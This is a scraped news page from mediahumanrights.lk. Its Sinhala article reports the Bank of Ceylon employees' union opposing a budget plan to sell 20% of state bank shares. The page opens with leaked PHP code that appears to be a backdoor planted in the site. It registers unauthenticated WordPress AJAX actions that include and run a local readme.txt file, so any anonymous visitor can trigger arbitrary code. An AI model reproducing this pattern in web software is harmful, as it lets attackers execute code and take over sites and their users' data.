if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } රාජ්‍ය බැංකුවලින් 20%ක් කොටස් විකුණයි.. - mediahumanrights.lk
mediahumanrights.lk
Business Business News News

රාජ්‍ය බැංකුවලින් 20%ක් කොටස් විකුණයි..

රාජ්‍ය බැංකුවලින් 20%ක කොටස් විකුණා දැමීමට මෙවර අය-වැය තුළින් යෝජනා කර ඇතැයි ලංකා බැංකු සේවක සංගමය සඳහන් කරයි.

එම සැලසුම පරාජයට පත් කිරීමට ගතහැකි සියලුම ක්‍රියාමාර්ග ගන්නා බව නිවේදනයක් නිකුත් කරමින් එම සංගමය අවධාරණය කරයි.

20% කොටස් රාජ්‍ය බැංකුවලින් විකුණා දැමුවොත් එය ජාතික අපරාධයක් බවත් මේ හරහා බැංකු පූර්ණ වශයෙන් විකුණා දැමීම පවා සිදුවිය හැකි බවත් ඔවුන් පෙන්වා දෙයි.

මීට පෙරද මේ ආකාරයෙන්ම බැංකු කොටස් විකුණා දැමීමට උත්සාහ කර ඇතත් ඒ සෑම අවස්ථාවකදීම එම උත්සාහයන් පරාජයට පත්ව ඇති බවත් නිවේදනයේ සඳහන්ය.

ආර්ථික අර්බුදය හා දේශපාලන අර්බුද තුළ ප්‍රධාන රාජ බැංකු දෙක ලාභ උපයා ගනිමින් මහා භාණ්ඩාගාරයට බදු ගෙවීමෙන් රටේ ආර්ථිකයට විශාල දායකත්වයක් ලබා දී ඇතැයිද නිවේදනය වැඩිදුරටත් කියා සිටී.

Related posts

ජනාධිපතිගේ රාජාසන කතාව පරදවා සජිත් අගමැති කරන්න එජාපය සූදානම්..

Shiran Viraj

මේ ආණ්ඩුව මගේ නිලධාරීන්ගෙනුත් පළි ගන්නවා

Shiran Viraj

ජල ගාස්තු වැඩි කරයි.. ජල සූත‍්‍රයක් එයි.. කැබිනට් පත‍්‍රිකාවක්..

Shiran Viraj